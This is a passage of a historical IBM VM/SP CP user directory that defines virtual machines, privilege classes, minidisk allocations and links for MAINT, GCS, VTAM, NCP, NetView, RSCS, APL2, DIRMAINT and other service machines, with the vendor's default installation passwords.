ACCOUNT EREP IBMCE
|
|
LINK MAINT 201 192 RR
|
|
MDISK 191 3380 021 001 VMSRES WR READ WRITE 03131808
|
|
*
|
|
USER GCS GCS 5M 6M G
|
|
ACCOUNT GCS RECVM
|
|
OPTION ECMODE DIAG98
|
|
IPL GCS PARM AUTOLOG
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 595 595 RR
|
|
LINK MAINT 59E 59E RR
|
|
MDISK 191 3380 514 005 VMPK01 MR RGCS WGCS MGCS 03131808
|
|
*
|
|
USER IVPM1 IVPM1 3M 16M G
|
|
ACCOUNT ACT4 IVPM1
|
|
CONSOLE 009 3210
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 193 193 RR
|
|
LINK MAINT 194 194 RR
|
|
LINK MAINT 19D 19D RR
|
|
MDISK 191 3380 868 001 VMSRES WR READ WRITE 03131808
|
|
*
|
|
USER IVPM2 IVPM2 3M 4M G
|
|
ACCOUNT ACT5 IVPM2
|
|
CONSOLE 009 3210
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 193 193 RR
|
|
LINK MAINT 194 194 RR
|
|
LINK MAINT 19D 19D RR
|
|
MDISK 191 3380 869 001 VMSRES WR READ WRITE 03131808
|
|
*
|
|
USER MAINT CPCMS 6M 16M ABCDEFG
|
|
ACCOUNT 1 SYSPROG
|
|
OPTION ECMODE DIAG98
|
|
IPL CMS
|
|
IUCV *CCS P M 10
|
|
IUCV ANY P M 0
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
*
|
|
MDISK 123 3380 000 885 VMSRES MW RSYSRES WSYSRES MSYSRES 03131808
|
|
MDISK 124 3380 000 885 VMPK01 MW RSYSRES WSYSRES MSYSRES 03131808
|
|
MDISK 126 3380 000 885 VMSTGE MW RSYSRES WSYSRES MSYSRES 03131808
|
|
MDISK 127 3380 000 885 VMGCS1 MW RSYSRES WSYSRES MSYSRES 03131808
|
|
MDISK 129 3380 000 885 PROFPK MW RSYSRES WSYSRES MSYSRES 03131808
|
|
MDISK 130 3380 000 885 SQLPK MW RSYSRES WSYSRES MSYSRES 03131808
|
|
MDISK 131 3380 000 885 VMPK02 MW RSYSRES WSYSRES MSYSRES 03131808
|
|
*
|
|
* 19D - Help files
|
|
* 39D - Help files for NLS
|
|
* 19E - CMS extension disk. Most program products go here
|
|
* 190 - CMS nucleus and commands
|
|
* 191 - MAINT work disk and system dependent files
|
|
* 193 - CMS text / IPCS text / GCS interface texts
|
|
* 194 - CP text files and Maclibs
|
|
* 196 - HPO text files and Maclibs
|
|
* 201 - EREP files
|
|
* 293 - Aux and update files for CMS service
|
|
* 294 - Aux and update files for CP service
|
|
* 295 - CP/CMS EXPRESS/local service
|
|
* 296 - HPO aux and update files for service
|
|
* 3A0 - IPF online documentation
|
|
* 300 - VM/IPF system support, administration and operation dialogs
|
|
* 301 - IPF VM/VSE feature files
|
|
* 31A - Customer procedures and products not from VM/EXPRESS
|
|
* 310 - Maclibs for VM/IPF
|
|
* 319 - Some optional Program Products
|
|
* 393 - CMS source
|
|
* 394 - CP SOURCE
|
|
* 396 - HPO source
|
|
* 492 - TSAF
|
|
* 494 - TSAF
|
|
* 496 - IPCS service files
|
|
* 497 - IPCS source files
|
|
* 59E - GCS System disk extension
|
|
* 595 - GCS object code
|
|
* 596 - GCS service files
|
|
*
|
|
MDISK 19D 3380 308 025 VMSRES MW ALL WMAINT MMAINT 03131808
|
|
MDISK 39D 3380 333 025 VMSRES MW ALL WMAINT MMAINT 03131808
|
|
MDISK 19E 3380 245 147 VMPK01 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 190 3380 494 037 VMSRES MW ALL WMAINT MMAINT 03131808
|
|
MDISK 191 3380 088 010 VMSRES MW RMAINT WMAINT MMAINT 03131808
|
|
MDISK 193 3380 061 027 VMSRES MW RMAINT WMAINT MMAINT 03131808
|
|
MDISK 194 3380 022 027 VMSRES MW RMAINT WMAINT MMAINT 03131808
|
|
MDISK 196 3380 684 016 VMSRES MW RMAINT WMAINT MMAINT 03131808
|
|
MDISK 201 3380 567 023 VMSRES MW RMAINT WMAINT MMAINT 03131808
|
|
MDISK 293 3380 590 027 VMSRES MW RCMSAUX WCMSAUX MCMSAUX 03131808
|
|
MDISK 294 3380 663 021 VMSRES MW RCPAUX WCPAUX MCPAUX 03131808
|
|
MDISK 295 3380 531 014 VMSRES MW RUSRMOD WUSRMOD MUSRMOD 03131808
|
|
MDISK 296 3380 072 019 VMPK01 MW RCPAUX WCPAUX MCPAUX 03131808
|
|
MDISK 3A0 3380 128 001 VMPK01 MR ALL WMAINT MMAINT 03131808
|
|
MDISK 300 3380 097 015 VMPK01 MR ALL WMAINT MMAINT 03131808
|
|
*MDISK 301 3380 001 049 EDMD01 MW ALL WMAINT MMAINT 03131808
|
|
MDISK 31A 3380 870 003 VMSRES MW ALL WMAINT MMAINT 03131808
|
|
MDISK 310 3380 112 016 VMPK01 MR ALL WMAINT MMAINT 03131808
|
|
MDISK 319 3380 617 015 VMSRES MW ALL WMAINT MMAINT 03131808
|
|
MDISK 393 3380 001 063 VMSTGE WR RMAINT WMAINT 03131808
|
|
MDISK 394 3380 064 076 VMSTGE WR RMAINT WMAINT 03131808
|
|
MDISK 396 3380 147 034 VMSTGE WR RMAINT WMAINT 03131808
|
|
MDISK 492 3380 195 011 VMPK01 MW RTSFOBJ WTSFOBJ MTSFOBJ 03131808
|
|
MDISK 494 3380 721 011 VMSRES MW RTSFAUX WTSFAUX MTSFAUX 03131808
|
|
MDISK 496 3380 782 001 VMPK01 MW RIPCX WIPCSX MIPSX 03131808
|
|
MDISK 497 3380 140 007 VMSTGE MW RMAINT WMAINT 03131808
|
|
MDISK 59E 3380 181 010 VMPK01 MW ALL WMAINT MMAINT 03131808
|
|
MDISK 595 3380 214 031 VMPK01 MW RMAINT WMAINT MMAINT 03131808
|
|
MDISK 596 3380 700 021 VMSRES MW RGCSAUX WGCSAUX MGCSAUX 03131808
|
|
*
|
|
* 29E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Update files
|
|
* 36E - 5748-RC1 PVM 191 disk
|
|
* 39E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Source files
|
|
* 49E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Text files
|
|
*
|
|
MDISK 29E 3380 785 007 VMPK01 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 36E 3380 563 004 VMSRES RR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 39E 3380 181 045 VMSTGE WR RMAINT WMAINT 03131808
|
|
MDISK 49E 3380 792 007 VMPK01 MR RMAINT WMAINT MMAINT 03131808
|
|
*
|
|
* 348 - EP - ACF/NCP - NETVIEW - ACF/VTAM - ACF/SSP (VMFPARM DISK)
|
|
*
|
|
MDISK 348 3380 001 002 VMGCS1 MR RMAINT WMAINT MMAINT 03131808
|
|
*
|
|
* 298 - 5664-280 VTAM 191
|
|
* 299 - 5664-280 VTAM Base disk
|
|
* 29A - 5664-280 VTAM Run disk
|
|
* 29B - 5664-280 VTAM Merge disk
|
|
* 29C - 5664-280 VTAM Zap disk
|
|
* 29D - 5664-280 VTAM Delta disk
|
|
*
|
|
MDISK 298 3380 005 009 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 299 3380 200 024 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 29A 3380 156 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 29B 3380 224 020 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 29C 3380 244 005 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 29D 3380 860 020 VMGCS1 MR RMAINT WMAINT MMAINT 03131808
|
|
*
|
|
* 33F - 5664-289 ACF/SSP Base disk
|
|
* 340 - 5664-289 ACF/SSP Delta disk
|
|
* 341 - 5664-289 ACF/SSP Merge disk
|
|
* 342 - 5664-289 ACF/SSP Zap disk
|
|
* 343 - 5664-289 ACF/SSP Run disk
|
|
*
|
|
MDISK 33F 3380 687 048 VMGCS1 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 340 3380 830 010 VMGCS1 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 341 3380 840 020 VMGCS1 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 342 3380 249 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 343 3380 110 046 VMGCS1 MR RMAINT WMAINT MMAINT 03131808
|
|
*
|
|
* 352 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Base disk
|
|
* 353 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Delta disk
|
|
* 354 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Merge disk
|
|
* 355 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Run disk
|
|
* 356 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Zap disk
|
|
*
|
|
MDISK 352 3380 259 066 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 353 3380 325 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 354 3380 335 020 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 355 3380 355 088 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 356 3380 443 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
*
|
|
* 349 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) VMFPARM DISK
|
|
* 357 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Base disk
|
|
* 358 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Delta disk
|
|
* 359 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Merge disk
|
|
* 35A - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Zap disk
|
|
* 35B - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Run disk
|
|
*
|
|
MDISK 349 3380 003 002 VMGCS1 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 357 3380 453 066 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 358 3380 519 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 359 3380 529 020 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 35A 3380 637 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 35B 3380 549 088 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
*
|
|
* 330 - 5664-204 NETVIEW Base disk
|
|
* 331 - 5664-204 NETVIEW Delta disk
|
|
* 332 - 5664-204 NETVIEW Merge disk
|
|
* 333 - 5664-204 NETVIEW Zap disk
|
|
* 334 - 5664-204 NETVIEW Run disk
|
|
*
|
|
MDISK 330 3380 735 095 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 331 3380 647 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 332 3380 657 020 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 333 3380 677 010 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 334 3380 014 096 VMGCS1 WR RMAINT WMAINT MMAINT 03131808
|
|
*
|
|
* 29F - 5664-188 RSCSV2 Update files
|
|
* 39F - 5664-188 RSCSV2 User exits disk
|
|
* 49F - 5664-188 RSCSV2 Text disk
|
|
* 59F - 5664-188 RSCSV2 191 disk
|
|
*
|
|
MDISK 29F 3380 129 004 VMPK01 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 39F 3380 799 004 VMPK01 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 49F 3380 803 010 VMPK01 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 59F 3380 208 006 VMPK01 MR RMAINT WMAINT MMAINT 03131808
|
|
*
|
|
* 322 - 5664-283 VM/IS
|
|
* 326 - 5664-283 VM/IS
|
|
* 34A - 5668-905 Graphical Display and Query Facility (GDQF)
|
|
* 346 - 5668-AAA Query Management Facility (QMF)
|
|
* 347 - 5668-AAA Query Management Facility (QMF)
|
|
* 360 - 5664-329 Contextual File Search (CFSearch/370)
|
|
* 361 - 5664-370 Display Write/370
|
|
* 363 - 5668-890 Font Library Service Facility (FLSF)
|
|
*
|
|
MDISK 322 3380 734 007 VMPK01 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 326 3380 166 010 VMPK01 MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 34A 3380 164 052 VMSRES MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 346 3380 207 013 SQLPK MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 347 3380 220 023 SQLPK MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 360 3380 216 040 VMSRES MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 361 3380 768 027 VMSRES MR RMAINT WMAINT MMAINT 03131808
|
|
MDISK 363 3380 795 009 VMSRES MR RMAINT WMAINT MMAINT 03131808
|
|
*
|
|
USER OPERATNS OPERATNS 1M 2M BCEG
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 13 SYSPROG
|
|
LINK MAINT 300 300 RR
|
|
LINK MAINT 193 192 RR
|
|
MDISK 191 3380 547 001 VMSRES MR RIPCS WIPCS MIPCS 03131808
|
|
MDISK 193 3380 256 008 VMSRES MR RIPCS WIPCS MIPCS 03131808
|
|
*
|
|
USER OPERATOR OPERATOR 3M 16M ABCDEFG
|
|
ACCOUNT 2 OPERATOR
|
|
IPL CMS PARM AUTOCR
|
|
CONSOLE 009 3215 T MAINT
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
LINK MAINT 300 300 RR
|
|
MDISK 191 3380 545 002 VMSRES MR ROPER WOPER MOPER 03131808
|
|
*
|
|
USER SYSDUMP1 SYSDUMP1 1M 1M BG
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 16 SYSTEM
|
|
LINK MAINT 300 300 RR
|
|
MDISK 123 3380 000 885 VMSRES RR 03131808
|
|
MDISK 124 3380 000 885 VMPK01 RR 03131808
|
|
MDISK 126 3380 000 885 VMSTGE RR 03131808
|
|
MDISK 127 3380 000 885 VMGCS1 RR 03131808
|
|
MDISK 129 3380 000 885 PROFPK RR 03131808
|
|
MDISK 130 3380 000 885 SQLPK RR 03131808
|
|
MDISK 131 3380 000 885 VMPK02 RR 03131808
|
|
MDISK 191 3380 133 001 VMPK01 MR RSYSDUMP WSYSDUMP MSYSDUMP 03131808
|
|
*
|
|
USER TSAFVM TSAFVM 4M 8M G
|
|
ACCOUNT 1 XXXXXX
|
|
OPTION MAXCONN 256 BMX ECMODE COMSRV ACCT CONCEAL REALTIMER
|
|
IUCV ALLOW
|
|
IUCV *CRM
|
|
IPL CMS PARM AUTOCR
|
|
CONSOLE 009 3215 A OPERATOR
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
LINK MAINT 492 192 RR
|
|
LINK MAINT 494 494 RR
|
|
*DEDICATE 300 4A0
|
|
MDISK 191 3380 206 002 VMPK01 MR 03131808
|
|
*
|
|
USER VSEMAINT VSEMAINT 1M 4M BG
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 211 DOSSYS
|
|
LINK MAINT 300 300 RR
|
|
*LINK MAINT 301 301 RR
|
|
MDISK 191 3380 632 004 VMSRES MR RVSEMAIN WVSEMAIN MVSEMAIN 03131808
|
|
*
|
|
USER VSEIPO VSEIPO 16M 16M G
|
|
*
|
|
* SAMPLE USERID TO RUN VSE/EXPRESS/IPO
|
|
*
|
|
ACCOUNT 203 VSEIPO
|
|
IPL 224
|
|
*OPTION ECMODE BMX REALTIMER VIRT=REAL MAXCONN 050 STF 370E
|
|
OPTION ECMODE BMX REALTIMER MAXCONN 050
|
|
IUCV *CCS PRIORITY MSGLIMIT 050
|
|
CONSOLE 01F 3270
|
|
SPECIAL 401 3270
|
|
SPECIAL 402 3270
|
|
SPECIAL 403 3270
|
|
SPECIAL 404 3270
|
|
SPECIAL 405 3270
|
|
SPECIAL 406 3270
|
|
SPECIAL 407 3270
|
|
SPECIAL 408 3270
|
|
SPECIAL 409 3270
|
|
SPECIAL 40A 3270
|
|
SPECIAL 40B 3270
|
|
SPECIAL 40C 3270
|
|
SPECIAL 40D 3270
|
|
SPECIAL 40E 3270
|
|
SPECIAL 40F 3270
|
|
SPECIAL 410 3270
|
|
SPECIAL 411 3270
|
|
SPECIAL 412 3270
|
|
SPECIAL 413 3270
|
|
SPECIAL 414 3270
|
|
SPECIAL 415 3270
|
|
SPECIAL 416 3270
|
|
SPECIAL 417 3270
|
|
SPECIAL 418 3270
|
|
SPECIAL 419 3270
|
|
SPECIAL 41A 3270
|
|
SPECIAL 41B 3270
|
|
SPECIAL 41C 3270
|
|
SPECIAL 41D 3270
|
|
SPECIAL 41E 3270
|
|
SPECIAL 41F 3270
|
|
SPOOL 00C 3505 A
|
|
SPOOL 00D 3525 A
|
|
SPOOL 00E 3203 A
|
|
SPOOL 05D 3525 A
|
|
SPOOL 05E 1403 A
|
|
DEDICATE 300 400
|
|
DEDICATE 080 080
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19E 19E RR
|
|
LINK VSEMAINT 191 191 RR
|
|
* 3380 SYSTEM
|
|
*MDISK 150 3380 000 885 DOSRES MR VSEIPO VSEIPO
|
|
*MDISK 151 3380 000 885 SYSWK1 MR VSEIPO VSEIPO
|
|
*MDISK 152 3380 000 885 SYSWK2 MR VSEIPO VSEIPO
|
|
* 3375 SYSTEM
|
|
*MDISK 140 3375 000 959 DOSRES MR VSEIPO VSEIPO
|
|
*MDISK 141 3375 000 959 SYSWK1 MR VSEIPO VSEIPO
|
|
*MDISK 142 3375 000 959 SYSWK2 MR VSEIPO VSEIPO
|
|
* FB-512 SYSTEM
|
|
*MDISK 240 FB-512 00000 558000 DOSRES MR VSEIPO VSEIPO
|
|
*MDISK 241 FB-512 00000 558000 SYSWK1 MR VSEIPO VSEIPO
|
|
*MDISK 242 FB-512 00000 558000 SYSWK2 MR VSEIPO VSEIPO
|
|
* 3350 SYSTEM
|
|
MDISK 220 3350 000 555 SYSWKB MR VSE220 VSE0WO
|
|
MDISK 222 3350 000 555 SYSWK2 MR VSE222 VSE2WO
|
|
MDISK 223 3350 000 555 SYSWK4 MR VSE223 VSE3WO
|
|
MDISK 224 3350 000 555 DOSRES MR VSE224 VSE4WO
|
|
MDISK 225 3350 000 555 SYSWK1 MR VSE225 VSE5WO
|
|
* 3380 SYSTEM
|
|
MDISK 200 3380 000 885 SYSWKA MR VSE219 VSEAWO
|
|
*
|
|
USER ROUTER ROUTER 512K 2M G 64 ON ON ON ON
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 46 ROUTER
|
|
MDISK 191 3380 636 003 VMSRES MR RROUTER WROUTER MROUTER 03131808
|
|
*
|
|
USER AP2SVP AP2SVP 512K 8M EG 64 ON ON ON ON
|
|
*
|
|
* 5668899 APL2 SERVICE MACHINE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 9999 APL2-SVP
|
|
MDISK 191 3380 731 003 VMPK01 MR RAP2SVP WAP2SVP MAP2SVP 03131808
|
|
*
|
|
USER APL2PP APL2PP 3M 16M BEG 64 ON ON ON ON
|
|
*
|
|
* 5668899 APL2
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 9999 I5668899
|
|
MDISK 191 3380 264 044 VMSRES MR ALL WAPL2PP 03131808
|
|
*
|
|
USER VMASSYS VMASSYS 16M 16M EG 64 ON ON ON ON
|
|
*
|
|
* 5767032 AS
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 15 SYSTEM
|
|
LINK ISPVM 192 192 RR
|
|
LINK SQLDBA 195 195 RR
|
|
MDISK 191 3380 569 018 VMPK01 MR RVMASSYS WVMASSYS INSTALL 03131808
|
|
MDISK 391 3380 587 095 VMPK01 MR RVMASSYS WVMASSYS SYSTEM 03131808
|
|
MDISK 392 3380 682 005 VMPK01 MR RVMASSYS WVMASSYS TEST 03131808
|
|
MDISK 393 3380 687 026 VMPK01 MR RVMASSYS WVMASSYS IPCS 03131808
|
|
*
|
|
USER VMASMON VMASMON 2M 2M G 64 ON ON ON ON
|
|
*
|
|
* 5767032 AS
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 15 SYSTEM
|
|
OPTION MAXCONN 20
|
|
IUCV ALLOW
|
|
LINK VMASSYS 191 390 RR
|
|
LINK VMASSYS 391 391 RR
|
|
MDISK 191 3380 567 002 VMPK01 MR RVMASMON WVMASMON MVMASMON 03131808
|
|
*
|
|
USER VMASTEST VMASTEST 2M 2M G 64 ON ON ON ON
|
|
*
|
|
* 5767032 AS
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 15 SYSTEM
|
|
LINK VMASSYS 391 391 RR
|
|
LINK VMASSYS 392 392 RR
|
|
MDISK 191 3380 713 018 VMPK01 MR RVMASTES WVMASTES MVMASTES 03131808
|
|
*
|
|
USER BATCH BATCH 2M 2M ABEG 64 ON ON ON ON
|
|
*
|
|
* 5664364 VM BATCH FACILITY
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
IUCV ALLOW
|
|
OPTION BMX MAXCONN 256
|
|
MDISK 191 3380 741 003 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808
|
|
MDISK 193 3380 744 020 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808
|
|
MDISK 194 3380 764 003 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808
|
|
MDISK 199 3380 767 002 VMPK01 RR RVMBATCH WVMBATCH MVMBATCH 03131808
|
|
MDISK 195 3380 769 002 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808
|
|
*
|
|
USER BATCH1 BATCH1 2M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5664364 VM BATCH FACILITY TEST USERID
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
MDISK 191 3380 771 005 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808
|
|
*
|
|
USER BATCH2 BATCH2 2M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5664364 VM BATCH FACILITY TEST USERID
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
MDISK 191 3380 776 005 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH 03131808
|
|
*
|
|
* USER CSPUSER CSPUSER 2M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5668814 CSP
|
|
*
|
|
* INCLUDE EXPPROF
|
|
* ACCOUNT 101
|
|
* MDISK 191 3380 134 032 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER 03131808
|
|
* MDISK 193 3380 519 008 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER 03131808
|
|
* MDISK 502 3380 527 020 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER 03131808
|
|
* MDISK 503 3380 547 020 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER 03131808
|
|
*
|
|
USER CVIEW CVIEW 2M 2M G 64 ON ON ON ON
|
|
*
|
|
* 5664296 CVIEW
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 15 SYSTEM
|
|
OPTION BMX
|
|
LINK MAINT 193 193 RR
|
|
MDISK 191 3380 732 004 VMSRES MR RCVIEW WCVIEW 03131808
|
|
*
|
|
USER DIRMAINT DIRMAINT 1M 2M BG 64 ON ON ON ON
|
|
*
|
|
* 5748XE4 DIRMAINT
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 7 SYSADMIN
|
|
OPTION REALTIME ECMODE
|
|
MDISK 191 3380 191 004 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808
|
|
MDISK 193 3380 001 009 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808
|
|
MDISK 195 3380 049 009 VMSRES MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808
|
|
MDISK 294 3380 844 004 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808
|
|
MDISK 394 3380 226 019 VMSTGE MR RDIRMAIN WDIRMAIN MDIRMAIN 03131808
|
|
MDISK 123 3380 000 885 VMSRES MW 03131808
|
|
*
|
|
USER DATAMOVE DATAMOVE 1M 1M G 64 ON ON ON ON
|
|
*
|
|
* 5748XE4 DATAMOVE MACHINE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 5 SYSADMIN
|
|
OPTION ACCT ECMODE
|
|
LINK DIRMAINT 191 193 RR
|
|
LINK MAINT 193 192 RR
|
|
MDISK 191 3380 178 003 VMPK01 MR RDATAMOV WDATAMOV MDATAMOV 03131808
|
|
*
|
|
USER FSFCNTRL FSFCNTRL 2M 16M ABG 64 ON ON ON ON
|
|
*
|
|
* 5798DMY FILE STORAGE CONTROL MACHINE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
OPTION ECMODE BMX MAXCONN 256
|
|
IUCV ALLOW PRIORITY MSGLIMIT 255
|
|
LINK FSFADMIN 192 198 RR
|
|
MDISK 191 3380 143 007 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
MDISK 192 3380 141 002 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
MDISK 193 3380 150 002 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
MDISK 194 3380 152 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
MDISK 195 3380 153 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
MDISK 197 3380 154 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
MDISK 200 3380 155 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
MDISK 201 3380 160 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
MDISK 400 3380 165 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
MDISK 401 3380 170 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR 03131808
|
|
*
|
|
USER FSFTASK1 FSFTASK1 1M 1M G 64 ON ON ON ON
|
|
*
|
|
* 5798DMY FILE STORAGE TASK MACHINE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
OPTION BMX MAXCONN 2
|
|
IUCV ALLOW PRIORITY MSGLIMIT 255
|
|
LINK FSFCNTRL 191 191 RR
|
|
*
|
|
USER FSFTASK2 FSFTASK2 1M 1M G 64 ON ON ON ON
|
|
*
|
|
* 5798DMY FILE STORAGE TASK MACHINE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
OPTION BMX MAXCONN 2
|
|
IUCV ALLOW PRIORITY MSGLIMIT 255
|
|
LINK FSFCNTRL 191 191 RR
|
|
*
|
|
USER FSFADMIN FSFADMIN 1M 1M G 64 ON ON ON ON
|
|
*
|
|
* 5798DMY FILE STORAGE ADMINISTRATOR
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
OPTION BMX MAXCONN 2
|
|
IUCV ALLOW PRIORITY MSGLIMIT 255
|
|
LINK MAINT 319 319 RR
|
|
MDISK 192 3380 175 003 VMPK02 MR RFSFADMI WFSFADMI MFSFADMI 03131808
|
|
*
|
|
USER IIPS IIPS 2M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5668012 IIPS
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 8 INSTR
|
|
MDISK 191 3380 736 013 VMSRES MR RIIPS WIIPS MIIPS 03131808
|
|
MDISK 193 3380 749 019 VMSRES MR RIIPS WIIPS MIIPS 03131808
|
|
*
|
|
USER ADMIN ADMIN 1664K 16M ABCDEFG 64 ON ON ON ON
|
|
*
|
|
* 5664318 VM/IPF
|
|
*
|
|
INCLUDE EXPPROF
|
|
LINK MAINT 300 300 RR
|
|
MDISK 191 3380 781 001 VMPK01 MR RADMIN WADMIN MADMIN 03131808
|
|
*
|
|
USER DISKACNT DISKACNT 512K 2M G 64 ON ON ON ON
|
|
*
|
|
* 5664318 VM/IPF
|
|
*
|
|
INCLUDE EXPPROF
|
|
OPTION ECMODE
|
|
LINK MAINT 300 300 RR
|
|
MDISK 191 3380 010 002 VMPK01 MR RDISKACN WDISKACN MDISKACN 03131808
|
|
*
|
|
USER CPRM CPRM 512K 1M G 64 ON ON ON ON
|
|
*
|
|
* 5664318 VM/IPF
|
|
*
|
|
INCLUDE EXPPROF
|
|
